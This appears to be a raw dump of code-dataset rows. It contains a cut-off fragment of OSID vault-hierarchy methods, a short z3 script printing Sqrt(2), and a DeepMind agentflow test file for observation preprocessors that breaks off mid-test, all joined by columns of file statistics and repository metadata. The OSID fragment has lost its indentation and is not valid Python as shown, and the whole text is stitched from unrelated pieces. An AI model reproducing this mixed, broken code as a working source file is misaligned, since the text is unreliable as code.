raise: AlreadyExists - ``vault_id`` is already a parent of
``child_id``
raise: NotFound - ``vault_id`` or ``child_id`` not found
raise: NullArgument - ``vault_id`` or ``child_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.add_child_bin_template
if self._catalog_session is not None:
return self._catalog_session.add_child_catalog(catalog_id=vault_id, child_id=child_id)
return self._hierarchy_session.add_child(id_=vault_id, child_id=child_id)
@utilities.arguments_not_none
def remove_child_vault(self, vault_id, child_id):
"""Removes a child from a vault.
arg: vault_id (osid.id.Id): the ``Id`` of a vault
arg: child_id (osid.id.Id): the ``Id`` of the child
raise: NotFound - ``vault_id`` not parent of ``child_id``
raise: NullArgument - ``vault_id`` or ``child_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.remove_child_bin_template
if self._catalog_session is not None:
return self._catalog_session.remove_child_catalog(catalog_id=vault_id, child_id=child_id)
return self._hierarchy_session.remove_child(id_=vault_id, child_id=child_id)
@utilities.arguments_not_none
def remove_child_vaults(self, vault_id):
"""Removes all children from a vault.
arg: vault_id (osid.id.Id): the ``Id`` of a vault
raise: NotFound - ``vault_id`` is not in hierarchy
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchyDesignSession.remove_child_bin_template
if self._catalog_session is not None:
return self._catalog_session.remove_child_catalogs(catalog_id=vault_id)
return self._hierarchy_session.remove_children(id_=vault_id)
| 45.960684
| 186
| 0.654709
| 18,342
| 161,322
| 5.587122
| 0.039581
| 0.014823
| 0.028503
| 0.035939
| 0.855863
| 0.834454
| 0.811727
| 0.78943
| 0.773466
| 0.743138
| 0
| 0.000752
| 0.266275
| 161,322
| 3,509
| 187
| 45.973782
| 0.865029
| 0.55957
| 0
| 0.606403
| 0
| 0
| 0.055129
| 0.006857
| 0
| 0
| 0
| 0.000285
| 0
| 1
| 0.13371
| false
| 0.001883
| 0.019774
| 0
| 0.317326
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a8071813703c97e154c1a58b74d953608becaf8d
| 235
|
py
|
Python
|
old-regressions/python/tst6.py
|
muchang/z3test
|
e3e7739f98b7aa85427fcb8a39a4c675132a896e
|
[
"MIT"
] | 23
|
2015-04-20T08:51:00.000Z
|
2021-11-15T12:20:59.000Z
|
old-regressions/python/tst6.py
|
muchang/z3test
|
e3e7739f98b7aa85427fcb8a39a4c675132a896e
|
[
"MIT"
] | 18
|
2016-03-02T15:17:42.000Z
|
2021-12-16T22:10:05.000Z
|
old-regressions/python/tst6.py
|
muchang/z3test
|
e3e7739f98b7aa85427fcb8a39a4c675132a896e
|
[
"MIT"
] | 30
|
2015-05-30T15:29:17.000Z
|
2022-02-25T15:58:58.000Z
|
# Copyright (c) 2015 Microsoft Corporation
from z3 import *
print(simplify(Sqrt(2)).sexpr())
set_option(":pp-decimal-precision", 50, pp_decimal=True)
print(simplify(Sqrt(2)).sexpr())
set_option(precision=20)
print(simplify(Sqrt(2)))
| 23.5
| 56
| 0.744681
| 35
| 235
| 4.914286
| 0.6
| 0.226744
| 0.296512
| 0.313953
| 0.372093
| 0.372093
| 0.372093
| 0
| 0
| 0
| 0
| 0.055556
| 0.080851
| 235
| 9
| 57
| 26.111111
| 0.740741
| 0.170213
| 0
| 0.333333
| 0
| 0
| 0.109375
| 0.109375
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.166667
| 0
| 0.166667
| 0.5
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
a81eba16cf9a55afaac7c0432d5bc776ba731b35
| 40,893
|
py
|
Python
|
py/agentflow/preprocessors/observation_transforms_test.py
|
wx-b/dm_robotics
|
5d407622360ccf7f0b4b50bcee84589e2cfd0783
|
[
"Apache-2.0"
] | 128
|
2021-09-08T18:39:39.000Z
|
2022-03-27T11:29:05.000Z
|
py/agentflow/preprocessors/observation_transforms_test.py
|
wx-b/dm_robotics
|
5d407622360ccf7f0b4b50bcee84589e2cfd0783
|
[
"Apache-2.0"
] | 7
|
2021-10-11T14:26:17.000Z
|
2022-03-15T17:26:45.000Z
|
py/agentflow/preprocessors/observation_transforms_test.py
|
LaudateCorpus1/dm_robotics
|
647bc810788c74972c1684a8d2e4d2dfd2791485
|
[
"Apache-2.0"
] | 8
|
2021-09-08T18:25:49.000Z
|
2022-02-21T23:45:16.000Z
|
# Copyright 2020 DeepMind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# python3
"""Tests for observations_transforms."""
import copy
from typing import Mapping, Optional, Type
from absl.testing import absltest
from absl.testing import parameterized
import cv2
import dm_env
from dm_env import specs
from dm_robotics.agentflow import spec_utils
from dm_robotics.agentflow import testing_functions
from dm_robotics.agentflow.preprocessors import observation_transforms
from dm_robotics.agentflow.preprocessors import timestep_preprocessor
from dm_robotics.transformations import transformations as tr
import numpy as np
_DEFAULT_TYPE = np.float64
def scalar_array_spec(name: str, dtype: Type[np.floating] = _DEFAULT_TYPE):
return specs.Array(shape=(), dtype=dtype, name=name)
@parameterized.parameters(
(observation_transforms.CastPreprocessor, float, float, float),
(observation_transforms.CastPreprocessor, np.float32, float,
float),
(observation_transforms.CastPreprocessor, np.float64, float,
float),
(observation_transforms.CastPreprocessor, float, np.float32,
np.float32),
(observation_transforms.CastPreprocessor, np.float32, np.float32,
np.float32),
(observation_transforms.CastPreprocessor, np.float64, np.float32,
np.float32),
(observation_transforms.CastPreprocessor, float, np.float64,
np.float64),
(observation_transforms.CastPreprocessor, np.float32, np.float64,
np.float64),
(observation_transforms.CastPreprocessor, np.float64, np.float64,
np.float64),
(observation_transforms.DowncastFloatPreprocessor, float, float,
float),
(observation_transforms.DowncastFloatPreprocessor, np.float32,
float, np.float32),
(observation_transforms.DowncastFloatPreprocessor, np.float64,
float, float),
(observation_transforms.DowncastFloatPreprocessor, float,
np.float32, np.float32),
(observation_transforms.DowncastFloatPreprocessor, np.float32,
np.float32, np.float32),
(observation_transforms.DowncastFloatPreprocessor, np.float64,
np.float32, np.float32),
(observation_transforms.DowncastFloatPreprocessor, float,
np.float64, float),
(observation_transforms.DowncastFloatPreprocessor, np.float32,
np.float64, np.float32),
(observation_transforms.DowncastFloatPreprocessor, np.float64,
np.float64, np.float64),
(observation_transforms.DowncastFloatPreprocessor, np.float128,
np.float64, np.float64),
# Non-floating point types should not be interefered with.
(observation_transforms.DowncastFloatPreprocessor, np.int32,
np.float64, np.int32),
)
class CastAndDowncastPreprocessorTest(absltest.TestCase):
def testCastPreprocessor_Array(
self, processor_type: timestep_preprocessor.TimestepPreprocessor,
src_type: Type[np.number], transform_type: Type[np.number],
expected_type: Type[np.number]):
# Arrange:
name = testing_functions.random_string(3)
processor = processor_type(transform_type)
input_observation_spec = {
name: specs.Array(shape=(2,), dtype=src_type, name=name),
}
expected_observation_spec = {
name: specs.Array(shape=(2,), dtype=expected_type, name=name),
}
input_reward_spec = scalar_array_spec(dtype=src_type,
name='reward')
expected_reward_spec = scalar_array_spec(dtype=expected_type,
name='reward')
input_discount_spec = scalar_array_spec(dtype=src_type,
name='discount')
expected_discount_spec = scalar_array_spec(dtype=expected_type,
name='discount')
input_timestep_spec = spec_utils.TimeStepSpec(
observation_spec=input_observation_spec,
reward_spec=input_reward_spec,
discount_spec=input_discount_spec)
input_timestep = timestep_preprocessor.PreprocessorTimestep(
step_type=np.random.choice(list(dm_env.StepType)),
reward=src_type(0.1),
discount=src_type(0.2),
observation={name: np.asarray([0.3, 0.4], dtype=src_type)},
pterm=0.1,
result=None)
# Act:
spec_utils.validate_timestep(input_timestep_spec, input_timestep)
output_timestep_spec = processor.setup_io_spec(input_timestep_spec)
# Assert:
expected_timestep = timestep_preprocessor.PreprocessorTimestep(
step_type=input_timestep.step_type,
reward=expected_type(0.1),
discount=expected_type(0.2),
observation={name: np.asarray([0.3, 0.4], dtype=expected_type)},
pterm=input_timestep.pterm,
result=None)
self.assertEqual(output_timestep_spec.observation_spec,
expected_observation_spec)
self.assertEqual(output_timestep_spec.reward_spec, expected_reward_spec)
self.assertEqual(output_timestep_spec.discount_spec, expected_discount_spec)
output_timestep = processor.process(input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(output_timestep.observation[name],
expected_timestep.observation[name])
np.testing.assert_almost_equal(output_timestep.reward,
expected_timestep.reward)
np.testing.assert_almost_equal(output_timestep.discount,
expected_timestep.discount)
def testCastPreprocessor_BoundedArray(
self, processor_type: timestep_preprocessor.TimestepPreprocessor,
src_type: Type[np.number], transform_type: Type[np.number],
expected_type: Type[np.number]):
"""Same as previous test, but using BoundedArray specs."""
# Arrange:
name = testing_functions.random_string(3)
processor = processor_type(transform_type)
input_minimum = np.asarray([0.3, 0.4], dtype=src_type)
input_maximum = np.asarray([0.5, 0.6], dtype=src_type)
input_observation_spec = {
name:
specs.BoundedArray(
shape=(2,),
dtype=src_type,
minimum=input_minimum,
maximum=input_maximum,
name=name),
}
input_reward_spec = scalar_array_spec(name='reward', dtype=src_type)
input_discount_spec = scalar_array_spec(name='discount', dtype=src_type)
input_timestep_spec = spec_utils.TimeStepSpec(
observation_spec=input_observation_spec,
reward_spec=input_reward_spec,
discount_spec=input_discount_spec)
input_timestep = timestep_preprocessor.PreprocessorTimestep(
step_type=np.random.choice(list(dm_env.StepType)),
reward=src_type(0.1),
discount=src_type(0.2),
observation={name: np.asarray([0.4, 0.5], dtype=src_type)},
pterm=0.1,
result=None)
# Act:
spec_utils.validate_timestep(input_timestep_spec, input_timestep)
output_timestep_spec = processor.setup_io_spec(input_timestep_spec)
# Assert:
expected_minimum = np.asarray([0.3, 0.4], dtype=expected_type)
expected_maximum = np.asarray([0.5, 0.6], dtype=expected_type)
expected_output_observation_spec = {
name:
specs.BoundedArray(
shape=(2,),
dtype=expected_type,
minimum=expected_minimum,
maximum=expected_maximum,
name=name),
}
expected_output_reward_spec = scalar_array_spec(
name='reward', dtype=expected_type)
expected_output_discount_spec = scalar_array_spec(
name='discount', dtype=expected_type)
expected_output_timestep = timestep_preprocessor.PreprocessorTimestep(
step_type=input_timestep.step_type,
reward=expected_type(0.1),
discount=expected_type(0.2),
observation={name: np.asarray([0.4, 0.5], dtype=expected_type)},
pterm=input_timestep.pterm,
result=None)
self.assertEqual(
set(output_timestep_spec.observation_spec.keys()),
set(expected_output_observation_spec.keys()))
spec_utils.verify_specs_equal_bounded(
output_timestep_spec.observation_spec[name],
expected_output_observation_spec[name])
self.assertEqual(output_timestep_spec.reward_spec,
expected_output_reward_spec)
self.assertEqual(output_timestep_spec.discount_spec,
expected_output_discount_spec)
output_timestep = processor.process(input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(output_timestep.observation[name],
expected_output_timestep.observation[name])
np.testing.assert_almost_equal(output_timestep.reward,
expected_output_timestep.reward)
np.testing.assert_almost_equal(output_timestep.discount,
expected_output_timestep.discount)
def testCastPreprocessor_RewardArray(
self, processor_type: timestep_preprocessor.TimestepPreprocessor,
src_type: Type[np.number], transform_type: Type[np.number],
expected_type: Type[np.number]):
# Arrange:
name = testing_functions.random_string(3)
processor = processor_type(transform_type)
input_observation_spec = {
name: specs.Array(shape=(2,), dtype=src_type, name=name),
}
expected_observation_spec = {
name: specs.Array(shape=(2,), dtype=expected_type, name=name),
}
input_reward_spec = specs.Array(shape=(3,), dtype=src_type,
name='reward')
expected_reward_spec = specs.Array(
shape=(3,), dtype=expected_type, name='reward')
input_discount_spec = scalar_array_spec(dtype=src_type,
name='discount')
expected_discount_spec = scalar_array_spec(dtype=expected_type,
name='discount')
input_timestep_spec = spec_utils.TimeStepSpec(
observation_spec=input_observation_spec,
reward_spec=input_reward_spec,
discount_spec=input_discount_spec)
# Some test data that matches the src_type.
if np.issubdtype(src_type, np.floating):
numbers = (0.1, 0.2, 0.3, 0.4, 0.1)
elif np.issubdtype(src_type, np.integer):
numbers = (1, 2, 3, 4, 5)
else:
raise ValueError(
'Only ints and floats are currently supported.')
input_timestep = timestep_preprocessor.PreprocessorTimestep(
step_type=np.random.choice(list(dm_env.StepType)),
reward=numbers[0] * np.ones(shape=(3,), dtype=src_type),
discount=src_type(numbers[1]),
observation={name: np.asarray(numbers[2:4], dtype=src_type)},
pterm=numbers[4],
result=None)
# Act:
spec_utils.validate_timestep(input_timestep_spec, input_timestep)
output_timestep_spec = processor.setup_io_spec(input_timestep_spec)
# Assert:
expected_timestep = timestep_preprocessor.PreprocessorTimestep(
step_type=input_timestep.step_type,
reward=numbers[0] * np.ones(shape=(3,), dtype=expected_type),
discount=expected_type(numbers[1]),
observation={name: np.asarray(numbers[2:4], dtype=expected_type)},
pterm=input_timestep.pterm,
result=None)
self.assertEqual(output_timestep_spec.observation_spec,
expected_observation_spec)
self.assertEqual(output_timestep_spec.reward_spec, expected_reward_spec)
self.assertEqual(output_timestep_spec.discount_spec, expected_discount_spec)
output_timestep = processor.process(input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(output_timestep.observation[name],
expected_timestep.observation[name])
np.testing.assert_almost_equal(output_timestep.reward,
expected_timestep.reward)
np.testing.assert_almost_equal(output_timestep.discount,
expected_timestep.discount)
class RenameObservationsTest(absltest.TestCase):
def test_rename_observations(self):
preprocessor = observation_transforms.RenameObservations(
obs_mapping={'foo': 'pow', 'faw': 'biz'})
# Generate the input spec and input timestep
input_obs_spec = {
'foo': specs.Array(shape=(2,), dtype=np.float64, name='foo'),
'bar': specs.Array(shape=(2,), dtype=np.float64, name='bar'),
'faw': specs.Array(shape=(2,), dtype=np.float64, name='faw'),
}
input_spec = _build_unit_timestep_spec(observation_spec=input_obs_spec)
input_obs = {'foo': [1., 2.], 'bar': [3., 4.], 'faw': [5., 6.]}
input_timestep = dm_env.TimeStep(
step_type=dm_env.StepType.MID,
reward=_DEFAULT_TYPE(0.1),
discount=_DEFAULT_TYPE(0.8),
observation=input_obs)
# Setup expectations.
expected_output_spec = input_spec.replace(observation_spec={
'pow': specs.Array(shape=(2,), dtype=np.float64, name='pow'),
'bar': specs.Array(shape=(2,), dtype=np.float64, name='bar'),
'biz': specs.Array(shape=(2,), dtype=np.float64, name='biz'),
})
# Check the spec
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(output_spec.observation_spec,
expected_output_spec.observation_spec)
# Check the timestep.
output_timestep = preprocessor.process(input_timestep)
spec_utils.validate_timestep(output_spec, output_timestep)
np.testing.assert_array_equal(output_timestep.observation['pow'], [1., 2.])
def test_failure_when_renaming_missing_observations(self):
preprocessor = observation_transforms.RenameObservations(
obs_mapping={'foo': 'pow', 'faw': 'biz'})
# Generate the input spec and input timestep
input_obs_spec = {
'foo': specs.Array(shape=(2,), dtype=np.float64, name='foo'),
}
input_spec = _build_unit_timestep_spec(observation_spec=input_obs_spec)
# Calculating the output spec should fail.
with self.assertRaises(observation_transforms.MisconfigurationError):
preprocessor.setup_io_spec(input_spec)
def test_failure_for_duplicate_rename_targets(self):
obs_mapping = {'foo': 'pow', 'bar': 'pow'}
# Initialization should fail.
with self.assertRaises(observation_transforms.MisconfigurationError):
observation_transforms.RenameObservations(obs_mapping)
def test_failure_for_conflicting_rename_targets(self):
# Create the spec and timestep.
preprocessor = observation_transforms.RenameObservations(
obs_mapping={'foo': 'pow', 'faw': 'bar'})
# Generate the input spec and input timestep
input_obs_spec = {
'foo': specs.Array(shape=(2,), dtype=np.float64, name='foo'),
'faw': specs.Array(shape=(2,), dtype=np.float64, name='faw'),
'bar': specs.Array(shape=(2,), dtype=np.float64, name='bar'),
}
input_spec = _build_unit_timestep_spec(observation_spec=input_obs_spec)
# Calculating the output spec should fail.
with self.assertRaises(observation_transforms.MisconfigurationError):
preprocessor.setup_io_spec(input_spec)
class MergeObservationsTest(absltest.TestCase):
def test_merge_observation(self):
preprocessor = observation_transforms.MergeObservations(
obs_to_merge=['foo', 'bar'], new_obs='baz')
# Generate the input spec and input timestep
input_obs_spec = {
'foo': specs.Array(shape=(2,), dtype=np.float64, name='foo'),
'bar': specs.Array(shape=(2,), dtype=np.float64, name='bar'),
'faw': specs.Array(shape=(2,), dtype=np.float64, name='faw'),
}
input_spec = _build_unit_timestep_spec(observation_spec=input_obs_spec)
input_obs = {'foo': [1., 2.], 'bar': [3., 4.], 'faw': [3., 4.]}
input_timestep = dm_env.TimeStep(
step_type=dm_env.StepType.MID,
reward=_DEFAULT_TYPE(0.1),
discount=_DEFAULT_TYPE(0.8),
observation=input_obs)
# Setup expectations.
expected_output_spec = input_spec.replace(observation_spec={
'baz': specs.Array(shape=(4,), dtype=np.float64, name='baz'),
'faw': specs.Array(shape=(2,), dtype=np.float64, name='faw')
})
# Check the spec
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(output_spec.observation_spec,
expected_output_spec.observation_spec)
# Check the timestep.
output_timestep = preprocessor.process(input_timestep)
spec_utils.validate_timestep(output_spec, output_timestep)
np.testing.assert_array_equal(output_timestep.observation['baz'],
[1., 2., 3., 4.])
def test_failure_when_merging_missing_observation(self):
preprocessor = observation_transforms.MergeObservations(
obs_to_merge=['foo', 'bar'], new_obs='baz')
# Generate the input spec
input_obs_spec = {
'foo': specs.Array(shape=(2,), dtype=np.float64, name='foo')}
input_spec = _build_unit_timestep_spec(observation_spec=input_obs_spec)
# Calculating the output spec should fail.
with self.assertRaises(observation_transforms.MisconfigurationError):
preprocessor.setup_io_spec(input_spec)
def test_failure_for_conflicting_new_name(self):
preprocessor = observation_transforms.MergeObservations(
obs_to_merge=['foo', 'bar'], new_obs='faw')
# Generate the input spec and input timestep
input_obs_spec = {
'foo': specs.Array(shape=(2,), dtype=np.float64, name='foo'),
'bar': specs.Array(shape=(2,), dtype=np.float64, name='bar'),
'faw': specs.Array(shape=(2,), dtype=np.float64, name='faw'),
}
input_spec = _build_unit_timestep_spec(observation_spec=input_obs_spec)
# Calculating the output spec should fail.
with self.assertRaises(observation_transforms.MisconfigurationError):
preprocessor.setup_io_spec(input_spec)
class CropImageObservationTest(absltest.TestCase):
def setUp(self):
super().setUp()
self._input_obs_name = 'input_obs'
self._output_obs_name = 'output_obs'
# This has a shape of (4,5)
self._input_spec = testing_functions.random_array_spec(
shape=(4, 5, 3), dtype=float, name=self._input_obs_name)
self._input_observation_spec = {self._input_obs_name: self._input_spec}
self._input_obs_value = testing_functions.valid_value(self._input_spec)
self._input_timestep_spec = testing_functions.random_timestep_spec(
observation_spec=self._input_observation_spec)
self._input_timestep = testing_functions.random_timestep(
spec=self._input_timestep_spec,
observation={self._input_obs_name: self._input_obs_value})
spec_utils.validate_timestep(self._input_timestep_spec,
self._input_timestep)
def _get_expected_spec(self, value: np.ndarray):
return testing_functions.random_array_spec(
shape=value.shape, dtype=value.dtype, name=self._output_obs_name)
def testFullCrop(self):
"""Don't modify the input at all."""
processor = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=1.0,
crop_height_relative=1.0,
x_offset_relative=0.0,
y_offset_relative=0.0)
expected_value = self._input_obs_value
output_timestep_spec = processor.setup_io_spec(self._input_timestep_spec)
self.assertIn(self._output_obs_name, output_timestep_spec.observation_spec)
spec_utils.verify_specs_equal_unbounded(
self._input_spec.replace(name=self._output_obs_name),
output_timestep_spec.observation_spec[self._output_obs_name])
output_timestep = processor.process(self._input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(
output_timestep.observation[self._output_obs_name], expected_value)
def testCropNoOffset(self):
"""Crop to a region that is in a corner of the original observation."""
processor = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.4,
crop_height_relative=0.75,
x_offset_relative=0.0,
y_offset_relative=0.0)
expected_value = self._input_obs_value[:3, :2]
output_timestep_spec = processor.setup_io_spec(self._input_timestep_spec)
self.assertIn(self._output_obs_name, output_timestep_spec.observation_spec)
spec_utils.verify_specs_equal_unbounded(
self._get_expected_spec(expected_value),
output_timestep_spec.observation_spec[self._output_obs_name])
output_timestep = processor.process(self._input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(
output_timestep.observation[self._output_obs_name], expected_value)
def testSquareCropNoOffset(self):
"""Crop to a region that is in a corner of the original observation.
Leaving out the height parameter should default to a square crop.
"""
processor = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.4,
x_offset_relative=0.0,
y_offset_relative=0.0)
expected_value = self._input_obs_value[:2, :2]
output_timestep_spec = processor.setup_io_spec(self._input_timestep_spec)
self.assertIn(self._output_obs_name, output_timestep_spec.observation_spec)
spec_utils.verify_specs_equal_unbounded(
self._get_expected_spec(expected_value),
output_timestep_spec.observation_spec[self._output_obs_name])
output_timestep = processor.process(self._input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(
output_timestep.observation[self._output_obs_name], expected_value)
def testCropWithOffset(self):
"""Crop to the center of the observation."""
processor = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.6,
crop_height_relative=0.5,
x_offset_relative=0.5,
y_offset_relative=0.5)
expected_value = self._input_obs_value[1:3, 1:4]
output_timestep_spec = processor.setup_io_spec(self._input_timestep_spec)
self.assertIn(self._output_obs_name, output_timestep_spec.observation_spec)
spec_utils.verify_specs_equal_unbounded(
self._get_expected_spec(expected_value),
output_timestep_spec.observation_spec[self._output_obs_name])
output_timestep = processor.process(self._input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(
output_timestep.observation[self._output_obs_name], expected_value)
def testInvalidParams(self):
"""Ensure that invalid parameters cause Exceptions."""
# Zero width and height are invalid
with self.assertRaisesRegex(ValueError, 'zero'):
_ = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.,
crop_height_relative=0.,
x_offset_relative=0.,
y_offset_relative=0.)
# Negative width is invalid
with self.assertRaisesRegex(ValueError, 'width must be between'):
_ = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=-1.,
crop_height_relative=1.,
x_offset_relative=0.,
y_offset_relative=0.)
# Height > 1.0 is invalid
with self.assertRaisesRegex(ValueError, 'height must be between'):
_ = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=1.,
crop_height_relative=1.5,
x_offset_relative=0.,
y_offset_relative=0.)
# Offset > 1.0 is invalid
with self.assertRaisesRegex(ValueError, 'offset must be between'):
_ = observation_transforms.CropImageObservation(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.6,
crop_height_relative=1.,
x_offset_relative=1.5,
y_offset_relative=0.)
class CropSquareAndResizeTest(absltest.TestCase):
def setUp(self):
super().setUp()
self._input_obs_name = 'input_obs'
self._output_obs_name = 'output_obs'
# This has a shape of (4,5)
self._input_spec = testing_functions.random_array_spec(
shape=(4, 5), dtype=float, name=self._input_obs_name)
self._input_observation_spec = {self._input_obs_name: self._input_spec}
self._input_obs_value = testing_functions.valid_value(self._input_spec)
self._input_timestep_spec = testing_functions.random_timestep_spec(
observation_spec=self._input_observation_spec)
self._input_timestep = testing_functions.random_timestep(
spec=self._input_timestep_spec,
observation={self._input_obs_name: self._input_obs_value})
spec_utils.validate_timestep(self._input_timestep_spec,
self._input_timestep)
def _get_expected_spec(self, value: np.ndarray):
return testing_functions.random_array_spec(
shape=value.shape, dtype=value.dtype, name=self._output_obs_name)
def testCropNoOffset(self):
"""Crop to a region that is in a corner of the original observation."""
processor = observation_transforms.CropSquareAndResize(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.8,
side_length_pixels=4,
x_offset_relative=0.0,
y_offset_relative=0.0)
expected_value = self._input_obs_value[:4, :4]
output_timestep_spec = processor.setup_io_spec(self._input_timestep_spec)
self.assertIn(self._output_obs_name, output_timestep_spec.observation_spec)
spec_utils.verify_specs_equal_unbounded(
self._get_expected_spec(expected_value),
output_timestep_spec.observation_spec[self._output_obs_name])
output_timestep = processor.process(self._input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(
output_timestep.observation[self._output_obs_name], expected_value)
def testScaledCropNoOffset(self):
"""Crop to a region that is in a corner of the original observation."""
processor = observation_transforms.CropSquareAndResize(
input_obs_name=self._input_obs_name,
output_obs_name=self._output_obs_name,
crop_width_relative=0.8,
side_length_pixels=8,
x_offset_relative=0.0,
y_offset_relative=0.0,
interpolation=cv2.INTER_NEAREST)
# Nearest neighbor sampling should just duplicate the original pixels
expected_value = np.repeat(
np.repeat(self._input_obs_value[:4, :4], 2, axis=0), 2, axis=1)
output_timestep_spec = processor.setup_io_spec(self._input_timestep_spec)
self.assertIn(self._output_obs_name, output_timestep_spec.observation_spec)
spec_utils.verify_specs_equal_unbounded(
self._get_expected_spec(expected_value),
output_timestep_spec.observation_spec[self._output_obs_name])
output_timestep = processor.process(self._input_timestep)
spec_utils.validate_timestep(output_timestep_spec, output_timestep)
np.testing.assert_almost_equal(
output_timestep.observation[self._output_obs_name], expected_value)
class PoseRelativeTest(absltest.TestCase):
def _check_spec_float_unchanged(self, dtype):
preprocessor = observation_transforms.PoseRelativeToEpisodeStart(
pos_obs_name='pos', quat_obs_name='quat')
# Generate the input spec and input timestep
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=dtype, name='pos'),
'quat': specs.Array(shape=(4,), dtype=dtype, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
first_input_timestep = testing_functions.random_timestep(
spec=input_spec,
step_type=dm_env.StepType.FIRST)
# Setup expectations.
expected_output_spec = input_spec
# Check the spec
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(output_spec.observation_spec,
expected_output_spec.observation_spec)
# Check the timestep.
output_timestep = preprocessor.process(first_input_timestep)
spec_utils.validate_timestep(output_spec, output_timestep)
def test_spec_float32_unchanged(self):
self._check_spec_float_unchanged(dtype=np.float32)
def test_spec_float64_unchanged(self):
self._check_spec_float_unchanged(dtype=np.float64)
def test_initial_observations(self):
preprocessor = observation_transforms.PoseRelativeToEpisodeStart(
pos_obs_name='pos', quat_obs_name='quat')
# Generate the input spec and input timestep
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=np.float64, name='pos'),
'quat': specs.Array(shape=(4,), dtype=np.float64, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
input_obs = {
'pos': [1.0, -1.5, 3.2],
'quat': tr.euler_to_quat([0.1, 0.2, 0.3])
}
first_input_timestep = testing_functions.random_timestep(
spec=input_spec, step_type=dm_env.StepType.FIRST, observation=input_obs)
# Setup expectations.
expected_output_spec = input_spec
# Check the spec
output_spec = preprocessor.setup_io_spec(input_spec)
self.assertEqual(output_spec.observation_spec,
expected_output_spec.observation_spec)
# Check the timestep.
output_timestep = preprocessor.process(first_input_timestep)
spec_utils.validate_timestep(output_spec, output_timestep)
output_pos = output_timestep.observation['pos']
np.testing.assert_array_almost_equal(output_pos, [0., 0., 0.])
output_euler = tr.quat_to_euler(output_timestep.observation['quat'])
np.testing.assert_array_almost_equal(output_euler, [0., 0., 0.])
def test_relative_observations(self):
preprocessor = observation_transforms.PoseRelativeToEpisodeStart(
pos_obs_name='pos', quat_obs_name='quat')
# Generate the input spec and input timestep
input_obs_spec = {
'pos': specs.Array(shape=(3,), dtype=np.float64, name='pos'),
'quat': specs.Array(shape=(4,), dtype=np.float64, name='quat'),
}
input_spec = testing_functions.random_timestep_spec(
observation_spec=input_obs_spec)
input_obs = {
'pos': np.array([1.0, -1.5, 3.2]),
'quat': tr.euler_to_quat([0.0, 0.0, 0.0])
}
first_input_timestep = testing_functions.random_timestep(
spec=input_spec,
step_type=dm_env.StepType.FIRST,
observation=input_obs)
preprocessor.setup_io_spec(input_spec)
preprocessor.process(first_input_timestep)
pos_offset = np.array([0.1, -0.2, -0.3])
input_obs = {
'pos': (input_obs['pos'] + pos_offset),
'quat': tr.euler_to_quat([0.2, 0.0, 0.0])
}
second_input_timestep = testing_functions.random_timestep(
spec=input_spec,
step_type=dm_env.StepType.MID,
observation=input_obs)
output_timestep = preprocessor.process(second_input_timestep)
